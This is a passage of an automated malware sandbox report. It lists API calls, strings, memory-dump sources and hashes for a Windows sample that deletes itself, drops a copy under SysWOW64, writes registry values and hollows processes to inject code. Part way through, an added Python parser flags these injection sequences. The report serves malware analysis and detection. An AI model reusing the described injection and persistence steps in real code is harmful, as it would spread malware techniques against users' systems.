                                                                                        • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                        • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                        • DeleteFileA.KERNEL32(C:\Users\user\Desktop\874A7cigvX.exe), ref: 0040A407
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040405E,00000000,00000000,00000000), ref: 0040A42C
                                                                                        • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040877E,00000000,00000000,00000000), ref: 0040A469
                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                        • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                        • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                        • String ID: "$"$"$%X%08X$C:\Users\user\Desktop\874A7cigvX.exe$C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D$P$\$ycgeofkw
                                                                                        • API String ID: 2089075347-1962795566
                                                                                        • Opcode ID: 69071e7f72711d21cff6056459b1329949a0fa875525a2a87badba31d3a6a59d
                                                                                        • Instruction ID: 9e8e6158c267d4507ba39c142606b205eb09e8ef63bc9ae6e883bbf27c052806
                                                                                        • Opcode Fuzzy Hash: 69071e7f72711d21cff6056459b1329949a0fa875525a2a87badba31d3a6a59d
                                                                                        • Instruction Fuzzy Hash: 4A5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
                                                                                        • VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1965334864-0
                                                                                        • Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                        • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                        • Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                        • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,75920F10,00000000), ref: 00407472
                                                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,75920F10,00000000), ref: 004074F0
                                                                                        • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,75920F10,00000000), ref: 00407528
                                                                                        • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,75920F10,00000000), ref: 004076E7
                                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 00407717
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,75920F10,00000000), ref: 00407745
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 004077EF
                                                                                          • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                        • RegCloseKey.KERNELBASE(?), ref: 004077E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                        • String ID: "
                                                                                        • API String ID: 3433985886-123907689
                                                                                        • Opcode ID: 58688efdc745e23d79e1c9d42d0b110b33b2b67bc428880df89735915a056cb6
                                                                                        • Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
                                                                                        • Opcode Fuzzy Hash: 58688efdc745e23d79e1c9d42d0b110b33b2b67bc428880df89735915a056cb6
                                                                                        • Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D7024D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: cess$kernel32.dll
                                                                                        • API String ID: 4275171209-1230238691
                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction ID: 812c7047b637651cfe57936d190c6aea0a11fb53c0fbb91790050cd524f7a457
                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction Fuzzy Hash: B4525975A012299FDB64CF58C984BACBBB1BF09305F1480D9E54DAB391EB34AE85CF14
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
                                                                                        • Wow64GetThreadContext.KERNEL32(?,?,?,?,?,?,?,004122F8), ref: 004097EB
                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
                                                                                        • ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessThread$ContextWow64$CreateMemoryResumeTerminateWrite
                                                                                        • String ID: D
                                                                                        • API String ID: 2098669666-2746444292
                                                                                        • Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                        • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                        • Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                        • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
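The API listings in this report are the raw material for triage. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses lines in the listing format used on this page (bullet, optional "Part of subcall function X:" prefix, Name.MODULE(args), ref: address) and matches the two injection sequences the listings show: the CreateProcessA with dwCreationFlags 00000004 (CREATE_SUSPENDED), Wow64GetThreadContext, WriteProcessMemory, Wow64SetThreadContext, ResumeThread routine at 004097B1..0040985B, and the VirtualAllocEx with flProtect 00000040 (PAGE_EXECUTE_READWRITE) followed by WriteProcessMemory routine at 004063CA..004063EB. It also decodes the 08000000 (CREATE_NO_WINDOW) flag passed by the CreateProcessA call at 0040A120. The regex and the argument-position assumptions (dwCreationFlags is the sixth CreateProcessA argument, flProtect the fifth VirtualAllocEx argument) are mine; Joe Sandbox argument lists are stack-derived and may carry trailing caller values, so only the leading positions are trusted.

```python
"""Parse Joe Sandbox function-listing API lines and flag injection API sequences.

Added example, not Joe Sandbox code. The line format is inferred from the
listings on this page; the sample listings at the bottom are copied from them.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)

# Well-known Win32 constants: CreateProcess dwCreationFlags bits, VirtualAlloc* flProtect.
CREATION_FLAGS: Dict[int, str] = {
    0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS",
    0x10: "CREATE_NEW_CONSOLE", 0x08000000: "CREATE_NO_WINDOW",
}
PAGE_PROTECT: Dict[int, str] = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # raw tokens as listed; "?" means unresolved
    ref: Optional[str]       # call-site address
    subcall: Optional[str]   # set on "Part of subcall function X:" lines

    def hex_arg(self, i: int) -> Optional[int]:
        """Argument i as an int, or None when missing, '?' or not hex (e.g. 'EntryPoint')."""
        if i >= len(self.args):
            return None
        tok = self.args[i]
        return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn a block of listing lines into ApiCall records, keeping listing order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def decode_creation_flags(value: int) -> List[str]:
    return [name for bit, name in CREATION_FLAGS.items() if value & bit]


def decode_protect(value: int) -> str:
    return PAGE_PROTECT.get(value, f"0x{value:X}")


def _in_order(calls: List[ApiCall], preds: List[Callable[[ApiCall], bool]]) -> bool:
    """True if each predicate matches some call, in listing order (subsequence match)."""
    it = iter(calls)
    return all(any(p(c) for c in it) for p in preds)


def is_suspended_context_hijack(calls: List[ApiCall]) -> bool:
    """CreateProcess* with CREATE_SUSPENDED, then get context, write memory,
    set context, resume: the hollowing-style sequence in the 004097B1 routine."""
    return _in_order(calls, [
        lambda c: c.name.startswith("CreateProcess")
        and bool((c.hex_arg(5) or 0) & 0x4),          # dwCreationFlags is argument 5
        lambda c: c.name.endswith("GetThreadContext"),
        lambda c: c.name == "WriteProcessMemory",
        lambda c: c.name.endswith("SetThreadContext"),
        lambda c: c.name == "ResumeThread",
    ])


def is_remote_rwx_write(calls: List[ApiCall]) -> bool:
    """VirtualAllocEx with PAGE_EXECUTE_READWRITE followed by WriteProcessMemory."""
    return _in_order(calls, [
        lambda c: c.name == "VirtualAllocEx" and c.hex_arg(4) == 0x40,  # flProtect is argument 4
        lambda c: c.name == "WriteProcessMemory",
    ])


# Sample listings copied from this page (constructed test input for the parser).
HOLLOW_LISTING = """\
• CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
• Wow64GetThreadContext.KERNEL32(?,?,?,?,?,?,?,004122F8), ref: 004097EB
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
• WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
• Wow64SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
• ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B
"""
INJECT_LISTING = """\
• GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
• VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA
• WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB
"""
MISC_LISTING = """\
  • Part of subcall function 02612F88: GetModuleHandleA.KERNEL32(?), ref: 02612FA1
• GetTickCount.KERNEL32 ref: 0040EC78
"""

if __name__ == "__main__":
    for label, text in (("hollow", HOLLOW_LISTING), ("inject", INJECT_LISTING)):
        calls = parse_api_lines(text)
        print(label, "context-hijack:", is_suspended_context_hijack(calls),
              "rwx-write:", is_remote_rwx_write(calls))
```

The subsequence match deliberately tolerates unrelated calls between the steps (the TerminateProcess at 004097F9 sits between the context read and the write, which is the usual error-path layout), and it keys only on the leading argument positions, since anything past the documented parameter count in these listings is stack residue rather than a real argument.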
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                        • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                        • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreateEvent
                                                                                        • String ID:
                                                                                        • API String ID: 1371578007-0
                                                                                        • Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                        • Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
                                                                                        • Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                        • Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,004122F8,004042B6,00000000,00000001,004122F8,00000000,?,004098FD), ref: 00404021
                                                                                        • GetLastError.KERNEL32(?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 0040402C
                                                                                        • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404046
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 408151869-0
                                                                                        • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                        • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                        • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                        • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                        • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        • API ID: Time$CountFileInformationSystemTickVolume
                                                                                        • String ID:
                                                                                        • API String ID: 1209300637-0
                                                                                        • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                        • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                        • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                        • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,00401FA1), ref: 00406E55
                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,00000000,00000012), ref: 00406E8D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        • API ID: Name$AccountLookupUser
                                                                                        • String ID:
                                                                                        • API String ID: 2370142434-0
                                                                                        • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction ID: d69833bf2c7126fc9b7bd4b1d5117f4fe90a033eeaed535c4400ab00b2689cfd
                                                                                        • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction Fuzzy Hash: 0211F776900218EBDF21CFD4C884ADFB7BCAB04741F1542B6E502F6290DB749B989BE4
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 026324B6
                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 026324D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3833638111-0
                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction ID: 731b4e5af83ce6969af08a6139476cb71a40ba79aa53bcc4f5645b5c3b02c290
                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction Fuzzy Hash: 2FF096316007107BE7213BF9EC9DB6E76E8AF49738F100529FA46915C1DB74EC454AA1
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02D70223,?,?), ref: 02D70E19
                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02D70223,?,?), ref: 02D70E1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction ID: 1e332a13354e2b6ba836fca803a86de0039a6c13a583d90132fd488c4997e204
                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction Fuzzy Hash: E4D0123114512877D7002A94DC09BCD7B1CDF09B67F008011FB0DD9180C774994046E5
                                                                                        APIs
                                                                                          • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                          • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                          • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
                                                                                          • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                        • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1823874839-0
                                                                                        • Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                        • Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
                                                                                        • Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                        • Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C
                                                                                        APIs
                                                                                        • SetServiceStatus.SECHOST(00413394), ref: 004098EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        • API ID: ServiceStatus
                                                                                        • String ID:
                                                                                        • API String ID: 3969395364-0
                                                                                        • Opcode ID: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                        • Instruction ID: dd676a4af3dd8f9e000b524091363a81fd6157f1888c947a943bd607f736cbf1
                                                                                        • Opcode Fuzzy Hash: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                        • Instruction Fuzzy Hash: 02F0F271514208EFCB18CF14E89869A7BA0F348706B20C83EE82AD2371CB749A80DF0D
                                                                                        APIs
                                                                                        • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02D70929
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        • API ID: ProcessTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 560597551-0
                                                                                        • Opcode ID: ed1fa5443604d132978e6c58f8cc4a5f1646693310c318f56ccf6213ab4b7ad9
                                                                                        • Instruction ID: 46c7c7c6dcd93c711cbd188b681eb9ae36fa97d9339837816e323f92b9b16bc3
                                                                                        • Opcode Fuzzy Hash: ed1fa5443604d132978e6c58f8cc4a5f1646693310c318f56ccf6213ab4b7ad9
                                                                                        • Instruction Fuzzy Hash: 9F90043034437511DC3035DC0C01F4500133741734F7047307533DD1D0C54157004117
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0263219E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction ID: 5bb5f27c73bc6fd28f92f55c047a072dcb91be533e827f7c47be2bfb167a27e0
                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction Fuzzy Hash: 6C113F79A00208EFDB01DF98C985E98BBF5AF08350F058094FA489B361D371EE90DF84
                                                                                        APIs
                                                                                          • Part of subcall function 00404280: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                        • Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        • API ID: CreateEventSleep
                                                                                        • String ID:
                                                                                        • API String ID: 3100162736-0
                                                                                        • Opcode ID: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
                                                                                        • Instruction ID: e56085e6bf9507d1b9c0d1fa6774ae3e34a200a1ca8b69066151cd7271dcc025
                                                                                        • Opcode Fuzzy Hash: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
                                                                                        • Instruction Fuzzy Hash: 58F05472A81360A6E62226566C07F8F19040B95B24F05417EF744BA2C395E8495141ED
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 02D765F6
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02D76610
                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 02D76631
                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D76652
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1965334864-0
                                                                                        • Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                        • Instruction ID: a87bc67cbf40450740ba22f79bcb3910fa16d4734e1bce9b3f2e034070a2c557
                                                                                        • Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                        • Instruction Fuzzy Hash: 23113D71600258BFDB219F65DC46F9B3BACEB057A5F104064FA08A6251F7B5DD00CAB4
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32 ref: 02D79E6D
                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02D79FE1
                                                                                        • lstrcat.KERNEL32(?,?), ref: 02D79FF2
                                                                                        • lstrcat.KERNEL32(?,0041070C), ref: 02D7A004
                                                                                        • GetFileAttributesExA.KERNEL32(?,?,?), ref: 02D7A054
                                                                                        • DeleteFileA.KERNEL32(?), ref: 02D7A09F
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 02D7A0D6
                                                                                        • lstrcpy.KERNEL32 ref: 02D7A12F
                                                                                        • lstrlen.KERNEL32(00000022), ref: 02D7A13C
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 02D79F13
                                                                                          • Part of subcall function 02D77029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 02D77081
                                                                                          • Part of subcall function 02D76F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\kosqarwi,02D77043), ref: 02D76F4E
                                                                                          • Part of subcall function 02D76F30: GetProcAddress.KERNEL32(00000000), ref: 02D76F55
                                                                                          • Part of subcall function 02D76F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02D76F7B
                                                                                          • Part of subcall function 02D76F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02D76F92
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 02D7A1A2
                                                                                        • RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 02D7A1C5
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 02D7A214
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 02D7A21B
                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 02D7A265
                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D7A29F
                                                                                        • lstrcat.KERNEL32(?,00410A34), ref: 02D7A2C5
                                                                                        • lstrcat.KERNEL32(?,00000022), ref: 02D7A2D9
                                                                                        • lstrcat.KERNEL32(?,00410A34), ref: 02D7A2F4
                                                                                        • wsprintfA.USER32 ref: 02D7A31D
                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D7A345
                                                                                        • lstrcat.KERNEL32(?,?), ref: 02D7A364
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 02D7A387
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 02D7A398
